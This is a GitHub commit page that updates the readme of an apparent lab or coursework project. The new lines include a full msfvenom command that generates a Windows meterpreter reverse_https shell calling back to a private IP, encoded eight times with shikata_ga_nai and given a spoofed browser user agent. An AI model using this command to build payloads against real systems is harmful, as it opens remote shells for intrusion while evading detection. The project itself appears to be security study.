Skip to content

Commit

Permalink
Update readme.md
Browse files Browse the repository at this point in the history
  • Loading branch information
Xre0uS committed Jun 24, 2021
1 parent bff1694 commit 007b21f
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions final/readme.md
Original file line number Diff line number Diff line change
Expand Up @@ -9,3 +9,5 @@ Items:
6. ```payload_source.cpp``` source code of the payload.
7. ```shell.c``` raw shellcode generated by msfvenom, generated using ```msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.10 LPORT=443 HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -e x86/shikata_ga_nai -i 8 -f c > shell.c```
8. ```0.v2.exe``` and ```payload_source.v2.cpp``` are alternate versions of the payload.

*The payload here only connects to 192.168.0.10.

0 comments on commit 007b21f

Please sign in to comment.